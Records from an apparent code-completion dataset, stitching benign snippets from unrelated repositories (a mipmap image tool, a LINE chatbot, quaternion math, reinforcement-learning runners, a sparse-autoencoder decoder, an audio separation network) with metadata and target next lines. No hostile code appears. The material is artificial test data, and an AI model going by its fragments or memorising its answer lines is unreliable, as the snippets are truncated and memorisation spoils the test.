logger.info("--- Verifying that inputs resolutions do match ...")
return True if color.size == alpha.size else False
def _is_power_of_two_image(color: Image, logger: logging.Logger) -> bool:
"""Check if all dimensions of the input image are powers of two."""
logger.info("--- Verifying that inputs are power of two images ...")
for res in color.size:
if (res & (res - 1)) != 0:
return False
return True
def _get_mip_levels(image: Image, logger: logging.Logger) -> int:
"""Calculate the number of mip levels based on image size."""
logger.info("--- Calculating mip map levels...")
image_short_side = image.size[0] if image.size[0] < image.size[1] else image.size[1]
logger.info(f"--- Done. Miplevels: {round(math.log2(image_short_side))}")
return round(math.log2(image_short_side))
def _generate_background(image: Image, logger: logging.Logger) -> Image:
"""Generate a background image and returns the result Image object."""
logger.info("--- Generating background image and storing it in memory...")
average_image_color = image.resize((1, 1))
up_scaled_avg = average_image_color.resize(image.size, Image.NEAREST)
return up_scaled_avg
def _calculate_image_height(image_width: int, image: Image) -> int:
"""Calculate the height of the image based on the specified width."""
width_percent = (image_width / float(image.size[0]))
new_height = int((float(image.size[1]) * float(width_percent)))
return new_height
def _stack_mip_levels(average_bgr: str, miplevels: int, color: Image, origin_width: int, origin_height: int,
output_dir: str, logger: logging.Logger, resample: Image.Resampling = Image.BOX) -> None:
"""Stack Mipmap levels on a background Image with alpha integration to generate a single Image."""
stack = average_bgr
logger.info(f"--- Storing original resolution in memory: {origin_width, origin_height}")
logger.info(f"--- Beginning the stacking process. Please wait...")
for miplevel in range(miplevels):
width = 2 ** (miplevel + 1)
height = _calculate_image_height(width, color)
new_image = color.resize((width, height), resample)
to_stack = new_image.copy().resize((origin_width, origin_height), Image.NEAREST)
img_copy = stack.copy()
img_copy.paste(to_stack, (0, 0), to_stack)
stack = img_copy.copy()
logger.info(f"--- Saving stack to file: {output_dir}")
stack.save(output_dir)
logger.info(f"--- Output disk size: {os.path.getsize(output_dir) / float(1 << 20):,.2f} MB")
def _log_and_terminate(logger, message, level=logging.ERROR):
"""Log the given 'message' at the specified 'level' using the 'logger', and then terminate the logger."""
logger.log(level=level, msg=message)
terminate_loggers(logger)
def _make_logger_for_file(directory: str, filename: str) -> logging.Logger:
"""Constructs the full path to a log file, clears the existing log file, and sets up a logger."""
logs_directory = os.path.join(directory, "logs")
Path(logs_directory).mkdir(parents=True, exist_ok=True)
out_log_file = Path(os.path.join(logs_directory, f"{filename.split('.')[0]}.txt"))
clear_log_file(out_log_file)
return setup_logger("mipmap_flooding", out_log_file.__str__())
def run_mip_flooding(in_texture_color_abs_path: str, in_texture_alpha_abs_path: str, out_abs_path: str) -> None:
"""
Perform Mipmap Flooding on input color and alpha textures to optimize for disk storage.
This function processes a pair of input textures (color and alpha). It generates Mipmap levels, starting from the
original resolution and gradually downsizing to a 1x1 Mipmap. The function then assembles these Mipmaps, layer by
layer, reintegrating the alpha channel, until it reaches the original resolution.
Args:
in_texture_color_abs_path (str): The absolute path to the color texture image.
in_texture_alpha_abs_path (str): The absolute path to the alpha texture image.
out_abs_path (str): The absolute path for the output image.
Example:
run_mip_flooding('input_color.png', 'input_alpha.png', 'output_texture.png')
"""
start_time = time.perf_counter() | out_directory = get_output_directory(out_abs_path) | 3 | 2023-10-25 11:05:59+00:00 | 4k |
Lin-jun-xiang/chatgpt-line-bot | chatgpt_linebot/urls.py | [
{
"identifier": "Memory",
"path": "chatgpt_linebot/memory.py",
"snippet": "class Memory(MemoryInterface):\n \"\"\"Chat Memory\n \n Args:\n storage (List[Dict[str, str]]): Chat history, ex: \n [\n {'role': 'system', 'content': 'You are a helpful assistant.'},\n ... | import sys
import config
from fastapi import APIRouter, HTTPException, Request
from linebot import LineBotApi, WebhookHandler
from linebot.exceptions import InvalidSignatureError
from linebot.models import *
from chatgpt_linebot.memory import Memory
from chatgpt_linebot.modules import (
Horoscope,
ImageCrawler,
chat_completion,
recommend_videos,
)
from chatgpt_linebot.prompts import girlfriend | 2,643 |
sys.path.append(".")
line_app = APIRouter()
memory = Memory(3)
horoscope = Horoscope()
line_bot_api = LineBotApi(config.LINE_CHANNEL_ACCESS_TOKEN)
handler = WebhookHandler(config.LINE_CHANNEL_SECRET)
@line_app.post("/callback")
async def callback(request: Request) -> str:
"""LINE Bot webhook callback
Args:
request (Request): Request Object.
Raises:
HTTPException: Invalid Signature Error
Returns:
str: OK
"""
signature = request.headers["X-Line-Signature"]
body = await request.body()
# handle webhook body
try:
handler.handle(body.decode(), signature)
except InvalidSignatureError:
raise HTTPException(status_code=400, detail="Missing Parameter")
return "OK"
@handler.add(MessageEvent, message=(TextMessage))
def handle_message(event) -> None:
"""Event - User sent message
Args:
event (LINE Event Object)
Refs:
https://developers.line.biz/en/reference/messaging-api/#message-event
https://www.21cs.tw/Nurse/showLiangArticle.xhtml?liangArticleId=503
"""
if not isinstance(event.message, TextMessage):
return
reply_token = event.reply_token
user_id = event.source.user_id
response = None
# Get user sent message
user_message = event.message.text
pre_prompt = girlfriend
refine_message = f"{pre_prompt}:\n{user_message}"
if user_message.startswith('@img'):
try:
img_crawler = ImageCrawler(nums=5)
img_url = img_crawler.get_url(user_message.replace('@img', ''))
image_message = ImageSendMessage(
original_content_url=img_url, preview_image_url=img_url
)
line_bot_api.reply_message(reply_token=reply_token, messages=image_message)
except:
line_bot_api.reply_message(
reply_token=reply_token,
messages='Image cannot encode successfully.'
)
return
if user_message.startswith('@chat 星座運勢'):
response = horoscope.get_horoscope_response(user_message)
elif event.source.type == 'user':
user_name = line_bot_api.get_profile(user_id).display_name
print(f'{user_name}: {user_message}')
memory.append(user_id, 'user', refine_message)
response = chat_completion(user_id, memory)
elif event.source.type == 'group' and user_message.startswith('@chat'):
group_id = event.source.group_id
memory.append(group_id, 'user', refine_message.replace('@chat', ''))
response = chat_completion(group_id, memory)
elif event.source.type == 'room' and user_message.startswith('@chat'):
room_id = event.source.room_id
memory.append(room_id, 'user', refine_message.replace('@chat', ''))
response = chat_completion(room_id, memory)
# Reply with same message
if response:
messages = TextSendMessage(text=response)
line_bot_api.reply_message(reply_token=reply_token, messages=messages)
@line_app.get("/recommend")
def recommend_from_yt() -> None:
"""Line Bot Broadcast
Descriptions
------------
Recommend youtube videos to all followed users.
(Use cron-job.org to call this api)
References
----------
https://www.cnblogs.com/pungchur/p/14385539.html
https://steam.oxxostudio.tw/category/python/example/line-push-message.html
"""
|
sys.path.append(".")
line_app = APIRouter()
memory = Memory(3)
horoscope = Horoscope()
line_bot_api = LineBotApi(config.LINE_CHANNEL_ACCESS_TOKEN)
handler = WebhookHandler(config.LINE_CHANNEL_SECRET)
@line_app.post("/callback")
async def callback(request: Request) -> str:
"""LINE Bot webhook callback
Args:
request (Request): Request Object.
Raises:
HTTPException: Invalid Signature Error
Returns:
str: OK
"""
signature = request.headers["X-Line-Signature"]
body = await request.body()
# handle webhook body
try:
handler.handle(body.decode(), signature)
except InvalidSignatureError:
raise HTTPException(status_code=400, detail="Missing Parameter")
return "OK"
@handler.add(MessageEvent, message=(TextMessage))
def handle_message(event) -> None:
"""Event - User sent message
Args:
event (LINE Event Object)
Refs:
https://developers.line.biz/en/reference/messaging-api/#message-event
https://www.21cs.tw/Nurse/showLiangArticle.xhtml?liangArticleId=503
"""
if not isinstance(event.message, TextMessage):
return
reply_token = event.reply_token
user_id = event.source.user_id
response = None
# Get user sent message
user_message = event.message.text
pre_prompt = girlfriend
refine_message = f"{pre_prompt}:\n{user_message}"
if user_message.startswith('@img'):
try:
img_crawler = ImageCrawler(nums=5)
img_url = img_crawler.get_url(user_message.replace('@img', ''))
image_message = ImageSendMessage(
original_content_url=img_url, preview_image_url=img_url
)
line_bot_api.reply_message(reply_token=reply_token, messages=image_message)
except:
line_bot_api.reply_message(
reply_token=reply_token,
messages='Image cannot encode successfully.'
)
return
if user_message.startswith('@chat 星座運勢'):
response = horoscope.get_horoscope_response(user_message)
elif event.source.type == 'user':
user_name = line_bot_api.get_profile(user_id).display_name
print(f'{user_name}: {user_message}')
memory.append(user_id, 'user', refine_message)
response = chat_completion(user_id, memory)
elif event.source.type == 'group' and user_message.startswith('@chat'):
group_id = event.source.group_id
memory.append(group_id, 'user', refine_message.replace('@chat', ''))
response = chat_completion(group_id, memory)
elif event.source.type == 'room' and user_message.startswith('@chat'):
room_id = event.source.room_id
memory.append(room_id, 'user', refine_message.replace('@chat', ''))
response = chat_completion(room_id, memory)
# Reply with same message
if response:
messages = TextSendMessage(text=response)
line_bot_api.reply_message(reply_token=reply_token, messages=messages)
@line_app.get("/recommend")
def recommend_from_yt() -> None:
"""Line Bot Broadcast
Descriptions
------------
Recommend youtube videos to all followed users.
(Use cron-job.org to call this api)
References
----------
https://www.cnblogs.com/pungchur/p/14385539.html
https://steam.oxxostudio.tw/category/python/example/line-push-message.html
""" | videos = recommend_videos() | 3 | 2023-10-24 09:01:13+00:00 | 4k |
nv-tlabs/pacer | uhc/utils/math_utils_new.py | [
{
"identifier": "quaternion_matrix",
"path": "uhc/utils/transformation.py",
"snippet": "def quaternion_matrix(quaternion):\n \"\"\"Return homogeneous rotation matrix from quaternion.\n\n >>> M = quaternion_matrix([0.99810947, 0.06146124, 0, 0])\n >>> numpy.allclose(M, rotation_matrix(0.123, [1,... | import torch
import math
import numpy as np
from uhc.utils.transformation import (
quaternion_matrix,
quaternion_about_axis,
quaternion_inverse,
quaternion_multiply,
rotation_from_quaternion,
rotation_from_matrix,
) | 2,298 |
def ewma(x, alpha=0.05):
avg = x[0]
for i in x[1:]:
avg = alpha * i + (1 - alpha) * avg
return avg
def normal_entropy(std):
var = std.pow(2)
entropy = 0.5 + 0.5 * torch.log(2 * var * math.pi)
return entropy.sum(1, keepdim=True)
def normal_log_density(x, mean, log_std, std):
var = std.pow(2)
log_density = -(x - mean).pow(2) / (2 * var) - 0.5 * math.log(2 * math.pi) - log_std
return log_density.sum(1, keepdim=True)
def get_qvel_fd(cur_qpos, next_qpos, dt, transform=None):
v = (next_qpos[:3] - cur_qpos[:3]) / dt
qrel = quaternion_multiply(next_qpos[3:7], quaternion_inverse(cur_qpos[3:7]))
# qrel /= np.linalg.norm(qrel)
axis, angle = rotation_from_quaternion(qrel, True)
if angle > np.pi: # -180 < angle < 180
angle -= 2 * np.pi #
elif angle < -np.pi:
angle += 2 * np.pi
rv = (axis * angle) / dt
rv = transform_vec(rv, cur_qpos[3:7], "root")
qvel = (next_qpos[7:] - cur_qpos[7:]) / dt
qvel = np.concatenate((v, rv, qvel))
if transform is not None:
v = transform_vec(v, cur_qpos[3:7], transform)
qvel[:3] = v
return qvel
def get_angvel_fd(prev_bquat, cur_bquat, dt):
q_diff = multi_quat_diff(cur_bquat, prev_bquat)
n_joint = q_diff.shape[0] // 4
body_angvel = np.zeros(n_joint * 3)
for i in range(n_joint):
body_angvel[3 * i : 3 * i + 3] = (
rotation_from_quaternion(q_diff[4 * i : 4 * i + 4]) / dt
)
return body_angvel
def transform_vec(v, q, trans="root"):
if trans == "root":
|
def ewma(x, alpha=0.05):
avg = x[0]
for i in x[1:]:
avg = alpha * i + (1 - alpha) * avg
return avg
def normal_entropy(std):
var = std.pow(2)
entropy = 0.5 + 0.5 * torch.log(2 * var * math.pi)
return entropy.sum(1, keepdim=True)
def normal_log_density(x, mean, log_std, std):
var = std.pow(2)
log_density = -(x - mean).pow(2) / (2 * var) - 0.5 * math.log(2 * math.pi) - log_std
return log_density.sum(1, keepdim=True)
def get_qvel_fd(cur_qpos, next_qpos, dt, transform=None):
v = (next_qpos[:3] - cur_qpos[:3]) / dt
qrel = quaternion_multiply(next_qpos[3:7], quaternion_inverse(cur_qpos[3:7]))
# qrel /= np.linalg.norm(qrel)
axis, angle = rotation_from_quaternion(qrel, True)
if angle > np.pi: # -180 < angle < 180
angle -= 2 * np.pi #
elif angle < -np.pi:
angle += 2 * np.pi
rv = (axis * angle) / dt
rv = transform_vec(rv, cur_qpos[3:7], "root")
qvel = (next_qpos[7:] - cur_qpos[7:]) / dt
qvel = np.concatenate((v, rv, qvel))
if transform is not None:
v = transform_vec(v, cur_qpos[3:7], transform)
qvel[:3] = v
return qvel
def get_angvel_fd(prev_bquat, cur_bquat, dt):
q_diff = multi_quat_diff(cur_bquat, prev_bquat)
n_joint = q_diff.shape[0] // 4
body_angvel = np.zeros(n_joint * 3)
for i in range(n_joint):
body_angvel[3 * i : 3 * i + 3] = (
rotation_from_quaternion(q_diff[4 * i : 4 * i + 4]) / dt
)
return body_angvel
def transform_vec(v, q, trans="root"):
if trans == "root": | rot = quaternion_matrix(q)[:3, :3] | 0 | 2023-10-31 20:47:12+00:00 | 4k |
Improbable-AI/dexenv | dexenv/runner/base_runner.py | [
{
"identifier": "stack_data",
"path": "dexenv/utils/common.py",
"snippet": "def stack_data(data, torch_to_numpy=False, dim=0):\n if isinstance(data[0], dict):\n out = dict()\n for key in data[0].keys():\n out[key] = stack_data([x[key] for x in data], dim=dim)\n return ... | import numpy as np
import torch
from collections import deque
from dataclasses import dataclass
from omegaconf.dictconfig import DictConfig
from typing import Any
from dexenv.utils.common import stack_data
from dexenv.utils.data import TorchTrajectory
from dexenv.utils.info_util import TIMEOUT_KEY
from dexenv.utils.info_util import aggregate_traj_info
from dexenv.utils.info_util import info_has_key
from dexenv.utils.torch_utils import torch_to_np | 2,537 |
@dataclass
class BasicRunner:
agent: Any
env: Any
cfg: DictConfig
eval_env: Any = None
store_next_ob: bool = True
def __post_init__(self):
self.train_env = self.env
self.num_train_envs = self.env.num_envs
self.obs = None
if self.eval_env is None:
self.eval_env = self.env
self.train_ep_return = deque(maxlen=self.cfg.alg.deque_size)
self.train_ep_len = deque(maxlen=self.cfg.alg.deque_size)
self.train_success = deque(maxlen=self.cfg.alg.deque_size)
self.save_ob_in_eval = self.cfg.save_ob_in_eval
self.disable_tqdm = not self.cfg.alg.tqdm
self.reset_record()
def __call__(self, **kwargs):
raise NotImplementedError
def reset(self, env=None, *args, **kwargs):
if env is None:
env = self.train_env
self.obs = env.reset(*args, **kwargs)
self.reset_record()
def reset_record(self):
self.cur_ep_len = np.zeros(self.num_train_envs)
self.cur_ep_return = np.zeros(self.num_train_envs)
def create_traj(self, evaluation=False):
if evaluation:
capacity = self.cfg.alg.eval_rollout_steps
else:
capacity = self.cfg.alg.train_rollout_steps
return TorchTrajectory(capacity=capacity,
traj_keys_in_cpu=self.cfg.alg.traj_keys_in_cpu)
def handle_timeout(self, next_ob, done, reward, info, skip_record=False):
if info_has_key(info, TIMEOUT_KEY, single_info=True):
|
@dataclass
class BasicRunner:
agent: Any
env: Any
cfg: DictConfig
eval_env: Any = None
store_next_ob: bool = True
def __post_init__(self):
self.train_env = self.env
self.num_train_envs = self.env.num_envs
self.obs = None
if self.eval_env is None:
self.eval_env = self.env
self.train_ep_return = deque(maxlen=self.cfg.alg.deque_size)
self.train_ep_len = deque(maxlen=self.cfg.alg.deque_size)
self.train_success = deque(maxlen=self.cfg.alg.deque_size)
self.save_ob_in_eval = self.cfg.save_ob_in_eval
self.disable_tqdm = not self.cfg.alg.tqdm
self.reset_record()
def __call__(self, **kwargs):
raise NotImplementedError
def reset(self, env=None, *args, **kwargs):
if env is None:
env = self.train_env
self.obs = env.reset(*args, **kwargs)
self.reset_record()
def reset_record(self):
self.cur_ep_len = np.zeros(self.num_train_envs)
self.cur_ep_return = np.zeros(self.num_train_envs)
def create_traj(self, evaluation=False):
if evaluation:
capacity = self.cfg.alg.eval_rollout_steps
else:
capacity = self.cfg.alg.train_rollout_steps
return TorchTrajectory(capacity=capacity,
traj_keys_in_cpu=self.cfg.alg.traj_keys_in_cpu)
def handle_timeout(self, next_ob, done, reward, info, skip_record=False):
if info_has_key(info, TIMEOUT_KEY, single_info=True): | time_out = aggregate_traj_info(info, TIMEOUT_KEY, single_info=True) | 3 | 2023-10-25 17:22:41+00:00 | 4k |
ai-safety-foundation/sparse_autoencoder | sparse_autoencoder/autoencoder/components/unit_norm_decoder.py | [
{
"identifier": "ResetOptimizerParameterDetails",
"path": "sparse_autoencoder/autoencoder/types.py",
"snippet": "class ResetOptimizerParameterDetails(NamedTuple):\n \"\"\"Reset Optimizer Parameter Details.\n\n Details of a parameter that should be reset in the optimizer, when resetting\n it's c... | from typing import final
from jaxtyping import Float, Int64
from pydantic import PositiveInt, validate_call
from torch import Tensor
from torch.nn import Module, Parameter, init
from sparse_autoencoder.autoencoder.types import ResetOptimizerParameterDetails
from sparse_autoencoder.tensor_types import Axis
from sparse_autoencoder.utils.tensor_shape import shape_with_optional_dimensions
import einops
import torch | 1,910 | """Linear layer with unit norm weights."""
@final
class UnitNormDecoder(Module):
r"""Constrained unit norm linear decoder layer.
Linear layer decoder, where the dictionary vectors (columns of the weight matrix) are
constrained to have unit norm. This is done by removing the gradient information parallel to the
dictionary vectors before applying the gradient step, using a backward hook. It also requires
`constrain_weights_unit_norm` to be called after each gradient step, to prevent drift of the
dictionary vectors away from unit norm (as optimisers such as Adam don't strictly follow the
gradient, but instead follow a modified gradient that includes momentum).
$$ \begin{align*}
m &= \text{learned features dimension} \\
n &= \text{input and output dimension} \\
b &= \text{batch items dimension} \\
f \in \mathbb{R}^{b \times m} &= \text{encoder output} \\
W_d \in \mathbb{R}^{n \times m} &= \text{weight matrix} \\
z \in \mathbb{R}^{b \times m} &= f W_d^T = \text{UnitNormDecoder output (pre-tied bias)}
\end{align*} $$
Motivation:
Normalisation of the columns (dictionary features) prevents the model from reducing the
sparsity loss term by increasing the size of the feature vectors in $W_d$.
Note that the *Towards Monosemanticity: Decomposing Language Models With Dictionary
Learning* paper found that removing the gradient information parallel to the dictionary
vectors before applying the gradient step, rather than resetting the dictionary vectors to
unit norm after each gradient step, results in a small but real reduction in total
loss](https://transformer-circuits.pub/2023/monosemantic-features/index.html#appendix-autoencoder-optimization).
"""
_learnt_features: int
"""Number of learnt features (inputs to this layer)."""
_decoded_features: int
"""Number of decoded features (outputs from this layer)."""
_n_components: int | None
weight: Float[
Parameter,
Axis.names(Axis.COMPONENT_OPTIONAL, Axis.INPUT_OUTPUT_FEATURE, Axis.LEARNT_FEATURE),
]
"""Weight parameter.
Each column in the weights matrix acts as a dictionary vector, representing a single basis
element in the learned activation space.
"""
@property
def reset_optimizer_parameter_details(self) -> list[ResetOptimizerParameterDetails]:
"""Reset optimizer parameter details.
Details of the parameters that should be reset in the optimizer, when resetting
dictionary vectors.
Returns:
List of tuples of the form `(parameter, axis)`, where `parameter` is the parameter to
reset (e.g. encoder.weight), and `axis` is the axis of the parameter to reset.
"""
return [ResetOptimizerParameterDetails(parameter=self.weight, axis=-1)]
@validate_call
def __init__(
self,
learnt_features: PositiveInt,
decoded_features: PositiveInt,
n_components: PositiveInt | None,
*,
enable_gradient_hook: bool = True,
) -> None:
"""Initialize the constrained unit norm linear layer.
Args:
learnt_features: Number of learnt features in the autoencoder.
decoded_features: Number of decoded (output) features in the autoencoder.
n_components: Number of source model components the SAE is trained on.
enable_gradient_hook: Enable the gradient backwards hook (modify the gradient before
applying the gradient step, to maintain unit norm of the dictionary vectors).
"""
super().__init__()
self._learnt_features = learnt_features
self._decoded_features = decoded_features
self._n_components = n_components
# Create the linear layer as per the standard PyTorch linear layer
self.weight = Parameter(
torch.empty(
| """Linear layer with unit norm weights."""
@final
class UnitNormDecoder(Module):
r"""Constrained unit norm linear decoder layer.
Linear layer decoder, where the dictionary vectors (columns of the weight matrix) are
constrained to have unit norm. This is done by removing the gradient information parallel to the
dictionary vectors before applying the gradient step, using a backward hook. It also requires
`constrain_weights_unit_norm` to be called after each gradient step, to prevent drift of the
dictionary vectors away from unit norm (as optimisers such as Adam don't strictly follow the
gradient, but instead follow a modified gradient that includes momentum).
$$ \begin{align*}
m &= \text{learned features dimension} \\
n &= \text{input and output dimension} \\
b &= \text{batch items dimension} \\
f \in \mathbb{R}^{b \times m} &= \text{encoder output} \\
W_d \in \mathbb{R}^{n \times m} &= \text{weight matrix} \\
z \in \mathbb{R}^{b \times m} &= f W_d^T = \text{UnitNormDecoder output (pre-tied bias)}
\end{align*} $$
Motivation:
Normalisation of the columns (dictionary features) prevents the model from reducing the
sparsity loss term by increasing the size of the feature vectors in $W_d$.
Note that the *Towards Monosemanticity: Decomposing Language Models With Dictionary
Learning* paper found that removing the gradient information parallel to the dictionary
vectors before applying the gradient step, rather than resetting the dictionary vectors to
unit norm after each gradient step, results in a small but real reduction in total
loss](https://transformer-circuits.pub/2023/monosemantic-features/index.html#appendix-autoencoder-optimization).
"""
_learnt_features: int
"""Number of learnt features (inputs to this layer)."""
_decoded_features: int
"""Number of decoded features (outputs from this layer)."""
_n_components: int | None
weight: Float[
Parameter,
Axis.names(Axis.COMPONENT_OPTIONAL, Axis.INPUT_OUTPUT_FEATURE, Axis.LEARNT_FEATURE),
]
"""Weight parameter.
Each column in the weights matrix acts as a dictionary vector, representing a single basis
element in the learned activation space.
"""
@property
def reset_optimizer_parameter_details(self) -> list[ResetOptimizerParameterDetails]:
"""Reset optimizer parameter details.
Details of the parameters that should be reset in the optimizer, when resetting
dictionary vectors.
Returns:
List of tuples of the form `(parameter, axis)`, where `parameter` is the parameter to
reset (e.g. encoder.weight), and `axis` is the axis of the parameter to reset.
"""
return [ResetOptimizerParameterDetails(parameter=self.weight, axis=-1)]
@validate_call
def __init__(
self,
learnt_features: PositiveInt,
decoded_features: PositiveInt,
n_components: PositiveInt | None,
*,
enable_gradient_hook: bool = True,
) -> None:
"""Initialize the constrained unit norm linear layer.
Args:
learnt_features: Number of learnt features in the autoencoder.
decoded_features: Number of decoded (output) features in the autoencoder.
n_components: Number of source model components the SAE is trained on.
enable_gradient_hook: Enable the gradient backwards hook (modify the gradient before
applying the gradient step, to maintain unit norm of the dictionary vectors).
"""
super().__init__()
self._learnt_features = learnt_features
self._decoded_features = decoded_features
self._n_components = n_components
# Create the linear layer as per the standard PyTorch linear layer
self.weight = Parameter(
torch.empty( | shape_with_optional_dimensions(n_components, decoded_features, learnt_features), | 2 | 2023-10-27 07:37:15+00:00 | 4k |
NVlabs/handover-sim2real | examples/train.py | [
{
"identifier": "get_cfg",
"path": "handover_sim2real/config.py",
"snippet": "def get_cfg(handover_config_only=False):\n if not handover_config_only:\n cfg = _C\n else:\n cfg = _C_handover_config\n return cfg.clone()"
},
{
"identifier": "HandoverSim2RealPolicy",
"path"... | import argparse
import gym
import itertools
import numpy as np
import os
import ray
from datetime import datetime
from handover.benchmark_wrapper import EpisodeStatus, HandoverBenchmarkWrapper
from handover_sim2real.config import get_cfg
from handover_sim2real.policy import HandoverSim2RealPolicy
from handover_sim2real.utils import add_sys_path_from_env
from experiments.config import cfg_from_file, save_cfg_to_file
from core.trainer import (
AgentWrapper,
AgentWrapperGPU05,
ReplayMemoryWrapper,
ReplayMemoryWrapperBase,
RolloutAgentWrapperGPU1,
Trainer,
TrainerRemote,
)
from core.utils import get_noise_delta, get_valid_index, rand_sample_joint | 2,315 | # Copyright (c) 2022-2023 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# Licensed under the NVIDIA License [see LICENSE for details].
add_sys_path_from_env("GADDPG_DIR")
def parse_args():
parser = argparse.ArgumentParser(description="Train.")
parser.add_argument("--cfg-file", help="path to config file")
parser.add_argument("--seed", default=0, type=int, help="random seed")
parser.add_argument("--use-grasp-predictor", action="store_true", help="use grasp predictor")
parser.add_argument("--use-ray", action="store_true", help="use Ray")
parser.add_argument("--pretrained-dir", help="pretrained model directory")
parser.add_argument(
"opts",
nargs=argparse.REMAINDER,
help=(
"""modify config options at the end of the command; use space-separated """
""""PATH.KEY VALUE" pairs; see handover_sim2real/config.py, """
"""handover-sim/handover/config.py, and easysim/src/easysim/config.py for all options"""
),
)
args = parser.parse_args()
return args
class ActorWrapper:
def __init__(
self,
stage,
cfg,
use_ray,
rollout_agent,
expert_buffer,
online_buffer,
actor_seed,
grasp_agent,
grasp_pred_threshold,
):
self._stage = stage
self._cfg = cfg
self._use_ray = use_ray
self._expert_buffer = expert_buffer
self._online_buffer = online_buffer
self._use_grasp_predictor = grasp_agent is not None
self._env = HandoverBenchmarkWrapper(gym.make(self._cfg.ENV.ID, cfg=self._cfg))
| # Copyright (c) 2022-2023 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# Licensed under the NVIDIA License [see LICENSE for details].
add_sys_path_from_env("GADDPG_DIR")
def parse_args():
parser = argparse.ArgumentParser(description="Train.")
parser.add_argument("--cfg-file", help="path to config file")
parser.add_argument("--seed", default=0, type=int, help="random seed")
parser.add_argument("--use-grasp-predictor", action="store_true", help="use grasp predictor")
parser.add_argument("--use-ray", action="store_true", help="use Ray")
parser.add_argument("--pretrained-dir", help="pretrained model directory")
parser.add_argument(
"opts",
nargs=argparse.REMAINDER,
help=(
"""modify config options at the end of the command; use space-separated """
""""PATH.KEY VALUE" pairs; see handover_sim2real/config.py, """
"""handover-sim/handover/config.py, and easysim/src/easysim/config.py for all options"""
),
)
args = parser.parse_args()
return args
class ActorWrapper:
def __init__(
self,
stage,
cfg,
use_ray,
rollout_agent,
expert_buffer,
online_buffer,
actor_seed,
grasp_agent,
grasp_pred_threshold,
):
self._stage = stage
self._cfg = cfg
self._use_ray = use_ray
self._expert_buffer = expert_buffer
self._online_buffer = online_buffer
self._use_grasp_predictor = grasp_agent is not None
self._env = HandoverBenchmarkWrapper(gym.make(self._cfg.ENV.ID, cfg=self._cfg))
| self._policy = HandoverSim2RealPolicy( | 1 | 2023-10-26 23:25:13+00:00 | 4k |
vb000/SemanticHearing | src/training/dcc_tf_binaural.py | [
{
"identifier": "mod_pad",
"path": "src/training/dcc_tf.py",
"snippet": "def mod_pad(x, chunk_size, pad):\n # Mod pad the input to perform integer number of\n # inferences\n mod = 0\n if (x.shape[-1] % chunk_size) != 0:\n mod = chunk_size - (x.shape[-1] % chunk_size)\n\n x = F.pad(... | import os
import math
import logging
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torchaudio
from collections import OrderedDict
from typing import Optional
from copy import deepcopy
from torch import Tensor
from torchmetrics.functional import(
scale_invariant_signal_noise_ratio as si_snr,
signal_noise_ratio as snr,
signal_distortion_ratio as sdr,
scale_invariant_signal_distortion_ratio as si_sdr)
from src.training.dcc_tf import mod_pad, MaskNet
from src.helpers.eval_utils import itd_diff, ild_diff | 2,293 | padding=out_buf_len * L, bias=False),
nn.Tanh())
if pretrained_path is not None:
state_dict = torch.load(pretrained_path)['model_state_dict']
# Load all the layers except label_embedding and freeze them
for name, param in self.named_parameters():
if 'label_embedding' not in name:
param.data = state_dict[name]
param.requires_grad = False
def init_buffers(self, batch_size, device):
enc_buf = self.mask_gen.encoder.init_ctx_buf(batch_size, device)
dec_buf = self.mask_gen.decoder.init_ctx_buf(batch_size, device)
out_buf = torch.zeros(batch_size, self.model_dim, self.out_buf_len,
device=device)
return enc_buf, dec_buf, out_buf
def predict(self, x, label, enc_buf, dec_buf, out_buf):
# Generate latent space representation of the input
x = self.in_conv(x)
# Generate label embedding
l = self.label_embedding(label) # [B, label_len] --> [B, channels]
l = l.unsqueeze(1).unsqueeze(-1) # [B, 1, channels, 1]
# Generate mask corresponding to the label
m, enc_buf, dec_buf = self.mask_gen(x, l, enc_buf, dec_buf)
# Apply mask and decode
x = x * m
x = torch.cat((out_buf, x), dim=-1)
out_buf = x[..., -self.out_buf_len:]
x = self.out_conv(x)
return x, enc_buf, dec_buf, out_buf
def forward(self, inputs, init_enc_buf=None, init_dec_buf=None,
init_out_buf=None, pad=True, writer=None, step=None, idx=None):
"""
Extracts the audio corresponding to the `label` in the given
`mixture`. Generates `chunk_size` samples per iteration.
Args:
mixed: [B, n_mics, T]
input audio mixture
label: [B, num_labels]
one hot label
Returns:
out: [B, n_spk, T]
extracted audio with sounds corresponding to the `label`
"""
x, label = inputs['mixture'], inputs['label_vector']
if init_enc_buf is None or init_dec_buf is None or init_out_buf is None:
assert init_enc_buf is None and \
init_dec_buf is None and \
init_out_buf is None, \
"Both buffers have to initialized, or " \
"both of them have to be None."
enc_buf, dec_buf, out_buf = self.init_buffers(
x.shape[0], x.device)
else:
enc_buf, dec_buf, out_buf = \
init_enc_buf, init_dec_buf, init_out_buf
mod = 0
if pad:
pad_size = (self.L, self.L) if self.lookahead else (0, 0)
x, mod = mod_pad(x, chunk_size=self.L, pad=pad_size)
x, enc_buf, dec_buf, out_buf = self.predict(
x, label, enc_buf, dec_buf, out_buf)
# Remove mod padding, if present.
if mod != 0:
x = x[:, :, :-mod]
out = {'x': x}
if init_enc_buf is None:
return out
else:
return out, enc_buf, dec_buf, out_buf
# Define optimizer, loss and metrics
def optimizer(model, data_parallel=False, **kwargs):
params = [p for p in model.parameters() if p.requires_grad]
return optim.Adam(params, **kwargs)
def loss(_output, tgt):
pred = _output['x']
return -0.9 * snr(pred, tgt).mean() - 0.1 * si_snr(pred, tgt).mean()
def metrics(inputs, _output, gt):
""" Function to compute metrics """
mixed = inputs['mixture']
output = _output['x']
metrics = {}
def metric_i(metric, src, pred, tgt):
_vals = []
for s, t, p in zip(src, tgt, pred):
_vals.append(torch.mean((metric(p, t) - metric(s, t))).cpu().item())
return _vals
for m_fn in [snr, si_snr]:
metrics[m_fn.__name__] = metric_i(m_fn,
mixed[:, :gt.shape[1], :],
output,
gt)
return metrics
def test_metrics(inputs, _output, gt):
test_metrics = metrics(inputs, _output, gt)
output = _output['x']
delta_itds, delta_ilds, snrs = [], [], []
for o, g in zip(output, gt):
|
class Net(nn.Module):
def __init__(self, label_len, L=8,
model_dim=512, num_enc_layers=10,
dec_buf_len=100, num_dec_layers=2,
dec_chunk_size=72, out_buf_len=2,
use_pos_enc=True, conditioning="mult", lookahead=True,
pretrained_path=None):
super(Net, self).__init__()
self.L = L
self.out_buf_len = out_buf_len
self.model_dim = model_dim
self.lookahead = lookahead
# Input conv to convert input audio to a latent representation
